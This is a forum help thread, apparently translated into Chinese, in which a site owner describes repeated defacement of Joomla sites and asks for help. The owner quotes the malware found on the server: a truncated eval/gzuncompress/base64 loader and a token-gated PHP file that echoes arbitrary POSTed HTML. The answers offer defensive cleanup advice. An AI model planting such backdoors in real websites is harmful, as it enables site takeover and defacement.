我的两个网站不断发生类似的攻击(一个运行最新的 Joomla,一个没有)。
它通常会显示“被将军入侵”或类似内容。当我检查其中一个文件时,发现有一个 php 文件包含类似代码:
eval("?>".gzuncompress(base64_decode("eJzUvWmT4kiyKPp9... etc.
我还发现了一个奇怪的 htm 文件,里面有很多乱七八糟的代码。如果你需要的话,我可以把这些文件压缩后发布到某个地方。
攻击通常只是一个被修改的索引页和这个奇怪的 php 文件(但这次还有另一个带有此代码的 php 页面:
<?php
if ($_GET['randomId'] != "Wo9QPY5euhw0bEKfNve82PW926VyluUh2HA3FGAidHDwA7h3wwZCOA2F2kva028q") {
echo "Access Denied";
exit();
}
// display the HTML code:
echo stripslashes($_POST['wproPreviewHTML']);
?>
我已经恢复了原始索引页,但这真的很烦人。我还在检查我的电脑是否有木马,因为我读到有人可能用木马窃取了我的 ftp 凭据(但对于这个网站,我甚至没有使用 ftp)。
帮助!
答案1
您是否已将密码更改为更安全的密码?
答案2
您的服务器上安装的所有软件是否都是最新的(例如 Joomla,以及您安装的任何其他应用程序)?
您是否已更改托管帐户的密码并检查是否没有创建其他帐户(在您的控制面板中,如果有)。
清除黑客攻击后,您确定删除了所有修改吗:攻击者上传的新文件、攻击者修改的文件?这可能不仅限于您的网站的索引页。
答案3
首先,检查文件权限。如果这种情况经常发生,请尝试对 web_root 中的所有文件运行 755。(除了需要文件上传写入权限的文件夹)。
接下来,仔细查看您的日志。该应用程序不是 Joomla 自己开发的吗?我会查找异常的 URL 请求。确保您的日志已记录在其他地方。黑客可能会删除日志。
你知道 root 是否已被攻破吗?也请更改 root 的密码。
您是否使用 cpanel 编辑器来编辑文件?这很可能是 $_GET['randomID'] 段的原因。(http://www.zen-cart.com/forum/showthread.php?t=123442)
发布该 HTML 文件可能会有帮助。
答案4
这是您的网站上发生的事情:http://blog.unmaskparasites.com/2011/05/05/thousands-of-hacked-sites-seriously-poison-google-image-search-results/
数以千计的网站以这种方式遭到黑客攻击。